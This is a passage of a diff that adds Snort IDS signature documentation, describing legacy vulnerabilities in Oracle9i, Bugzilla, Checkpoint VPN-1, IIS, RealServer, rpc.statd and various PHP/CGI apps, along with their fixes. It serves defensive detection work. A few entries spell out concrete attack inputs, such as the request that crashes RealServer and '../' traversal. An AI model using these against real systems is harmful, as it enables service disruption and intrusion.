+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_snapshot_repobject
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1216.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1216
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/567.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+567
+
+--
+Summary: 
+This event is generated when a failed attempt is made to use a Simple Mail Transfer Protocol (SMTP) server to relay mail to a third party.
+
+--
+Impact: 
+Rejected of unauthorized use.  This event indicates that an SMTP server is properly configured to reject mail relay attempts.
+
+
+--
+Detailed Information: 
+An attacker may attempt to use an improperly configured SMTP server to relay mail, reflecting the origin of the mail to be the relay SMTP server instead of the actual sender.  A poorly configured SMTP server may be used to relay spam and other undesirable mail.  If an SMTP server rejects relay attempts, it will return an error message indicating the failure.  
+
+--
+Affected Systems: 
+SMTP servers
+
+--
+Attack Scenarios: 
+An attacker may attempt to relay mail through an improperly configured SMTP server.
+
+--
+Ease of Attack: 
+Simple
+
+--
+False Positives: 
+None Known
+
+--
+False Negatives: 
+An SMTP server may reject mail using other errors.
+
+--
+Corrective Action: 
+Configure an SMTP server to reject relayed mail.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids
+http://www.whitehats.com/info/IDS249
+
+Miscellaneous
+http://mail-abuse.org/tsi/ar-fix.html
+
+--
--- /dev/null
+++ b/doc/signatures/2073.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+2073
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Bugzilla.
+
+--
+Impact:
+Disclosure of sensitive information.
+
+--
+Detailed Information:
+The file globals.pl contains global variables used by Bugzilla 
+components. It is possible for this file to be read by a user via a web 
+browser.
+
+Details such as the username and password of the administrator account 
+for the database are stored in this file.
+
+--
+Affected Systems:
+Mozilla Bugzilla 2.4
+
+Mozilla Bugzilla 2.6
+
+Mozilla Bugzilla 2.8 for:
+	Microsoft Windows 95, 98, NT 3.51 and NT 4.0
+
+Mozilla Bugzilla 2.10
+
+--
+Attack Scenarios:
+The attacker merely needs to make a direct request for the file via a 
+browser or other agent.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate patches from the vendor.
+
+Ensure that the file globals.pl is not world readable.
+
+Upgrade to the latest version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0330
+
+Bugtraq:
+http://www.securityfocus.com/bid/2671
+
+--
--- /dev/null
+++ b/doc/signatures/100000763.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000763
+--
+Summary:
+This event is generated when an attempt is made to access the file "config.inc which contains known vulnerabilities in the "Kamikaze-QSCM" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access a file with known vulnerabilities from a remote machine used by the "Kamikaze-QSCM" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Kamikaze-QSCM
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2380.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2380
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Checkpoint VPN-1.
+
+--
+Impact:
+Unauthorized administrative access to Checkpoint VPN-1 systems
+
+--
+Detailed Information:
+Checkpoint VPN-1, SecuRemote and SecureClient contain an error that
+affects the processing of large Certificate requests to the VPN service.
+By sending a large amount of data in the Certificate Request payload an
+attacker may cause a buffer overflow condition to occur, presenting an
+opportunity to execute code of their choosing with the privileges of the
+user running the service, usually root.
+
+--
+Affected Systems:
+	CheckPoint Software FW-1 1.4.1 Service packs prior to SP6
+	CheckPoint Software FW-1 Next Generation FP1, FP0
+	CheckPoint Software VPN-1 1.4.1 SP5a
+	CheckPoint Software VPN-1 Next Generation FP1, FP0
+
+--
+Attack Scenarios:
+An attacker could supply a large Certificate Request payload containing
+code to be executed on the system.
+
+--
+Ease of Attack:
+Proof of concept code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1022.txt
@@ -0,0 +1,63 @@
+Note rule content has been altered for this rule.  Don't know if we should say so in documentation.
+Rule:
+
+--
+Sid:
+1022
+
+--
+Summary:
+This event is generated when an attempt is made to execute a shell command possibly associated with an exploit with the Microsoft Jet database engine. 
+
+--
+Impact:
+Remote access.  This attack may permit the execution of arbitrary commands on the vulnerable server.
+
+--
+Detailed Information:
+Microsoft Jet database engine facilitates the addition, modification, deletion, and search of database data.  Jet may be used as a backend for web applications.  It allows the use of embedded Visual Basic for Application expressions in SQL strings.  A vulnerability associated with inadequate filtering of user input allows an attacker to execute code on the vulnerable server by supplying a command delimited by "|" characters.
+
+--
+Affected Systems:
+Jet 3.5, 3.51
+
+--
+Attack Scenarios:
+An attacker can craft a special URL to execute arbitrary commands on a vulnerable server.
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable Jet ODBC drivers if they are not required.
+
+Upgrade to Jet 4.0.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms99-030.asp
+
+Bugtraq:
+http://www.securityfocus.com/bid/286
+
+
+--
--- /dev/null
+++ b/doc/signatures/1588.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1588
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2276.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2276
+
+--
+Summary:
+This event is generated when an attempt is made to access a
+demonstration application which may contain vulnerabilties on a server
+using the Oracle database system for the application.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Remove the demo set of scripts
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000579.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000579
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_struc.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "cat_struc.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/942.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+942
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/119-11.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+119-11
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This event may also constitute an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated when the http_inspect pre-processor detects the
+use of directory traversal in a web request. This may be an attempt to
+escape the web root directory or it may be an attempt to evade an IDS.
+
+--
+Affected Systems:
+	Microsoft IIS Servers
+
+--
+Attack Scenarios: 
+An attacker may supply a path to a file outside the web root by using
+"../" in the uri.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+This event may be generated if a web site uses "../" in links to other
+files on the site.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/100000653.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000653
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "name" parameter in the "index.php" script used 
+by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2335.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid: 
+2335
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in AppleShare IP FTP Server.
+
+--
+Impact:
+Denial of Service (DoS)
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious
+activity in FTP traffic between hosts.
+
+It is possible for a user to supply data to an FTP command, in this case
+RMD, and cause the service to become unavailble to other users.
+
+--
+Affected Systems:
+	Apple AppleShare IP 5.0, 5.0.1, 5.0.2, 5.0.3
+	Apple AppleShare IP 6.1, 6.2, 6.3, 6.3.1
+
+--
+Attack Scenarios:
+An attacker needs to login to the service and use the RMD command in a
+specific manner to cause the DoS.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2894.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2894
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2147.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 2147
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in the BLNews php application. 
+
+--
+Impact:
+Arbitrary code execution.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a vulnerability in the BLNews PHP application.
+
+It is possible for an attacker to include a PHP file of his choosing via a URL, the script is processed and executed with the privileges of the user running the webserver.
+
+--
+Affected Systems:
+Any host using BLNews.
+
+--
+Attack Scenarios:
+An attacker could include a PHP file of his choice by including the file name in a URI supplied to the webserver that would in turn process the script.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host.
+
+Check the webserver log files for signs of this activity.
+
+Where possible, ensure the webserver is run as an unprivileged process.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7677
+
+--
--- /dev/null
+++ b/doc/signatures/2912.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2912
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure register_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1913.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1916
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a format
+string vulnerability associated with the Remote Procedure Call (RPC)
+rpc.statd.
+
+--
+Impact:
+Remote root access. This may permit execution of arbitrary commands with
+the privileges of root.
+
+--
+Detailed Information:
+The rpc.statd daemon is a component of Network File System (NFS) that
+implements the Network Status and Monitor (NSM) RPC functions.  NSM
+monitors the status of NFS clients and servers and maintains a list of
+hosts that have registered to be notified when an NFS host crashes. 
+There is a format string vulnerability associated with the code that
+implements the monitoring of a given host, possibly permitting the
+execution of arbitrary commands with the privileges of root. 
+
+--
+Affected Systems:
+	Conectiva Linux 4.0, 4.1, 4.2, 5.0, 5.1
+	Debian Linux 2.2, 2.3
+	Red Hat Linux 6.0, 6.1, 6.2
+	SuSE Linux 6.3, 6.4, 7.0
+	Trustix Secure Linux 1.0, 1.1
+
+--
+Attack Scenarios:
+An attacker can attempt to exploit the format string error allowing
+execution of arbitrary commands with the privileges of root.  
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/278.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+278
+
+--
+Summary:
+This event is generated when a remote attacker transmits a malformed request for a page on a web server port, which can indicate a Denial of Service (DoS) attack on a RealNetworks RealServer.
+
+--
+Impact:
+The RealNetworks RealServer service will crash.
+
+--
+Detailed Information:
+RealNetworks RealServer is a server application that serves streaming audio to clients. When an attacker sends a request for a template file in the /viewsource/ directory with an empty variable value, RealServer crashes.   
+
+--
+Affected Systems:
+Systems running RealNetworks RealServer 7.0 with View Source functionality enabled.
+
+--
+Attack Scenarios:
+An attacker sends an HTTP request for /viewsource/template.html? on a RealServer audio server. RealServer crashes, stopping audio transmission.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a legitimate remote user attempts to use the View Source function on RealServer, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of the software or disable the View Source functionality. The vendor has issued an advisory, workarounds, and downloadable patches at http://service.real.com/help/faq/servgviewsrc.html.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+RealNetworks
+http://service.real.com/help/faq/servgviewsrc.html
+
+
+--
--- /dev/null
+++ b/doc/signatures/1147.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1147
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/820.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+820
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/989.txt
@@ -0,0 +1,63 @@
+Changed message since it really didn't reflect what was happening
+Rule:
+
+--
+Sid:
+989
+
+--
+Summary:
+This event is generated when an attempt is made to access the sensepost.exe file. 
+
+--
+Impact:
+Remote access. This attack may permit the execution of arbitrary commands on the vulnerable server. 
+
+--
+Detailed Information:
+A vulnerability associated Microsoft Internet Information Services (IIS) servers allows an attacker to escape the web root directory (inetpub) permitting navigation to unauthorized directories.  This vulnerability is exploitable by encoding characters in unicode because unauthorized directory traversal is not examined after the unicode decoding.  A widely available script exploits this vulnerability and copies the \winnt\system32\cmd.exe file to \inetpub\scripts\sensepost.exe, essentially allowing an attacker to execute arbitrary commands on the vulnerable host even after the patch has been applied. 
+
+--
+Affected Systems:
+Microsoft IIS 4.0, 5.0 
+
+--
+Attack Scenarios:
+An attacker can attempt to access the sensepost.exe file to execute arbitrary commands on the exploited server. 
+
+--
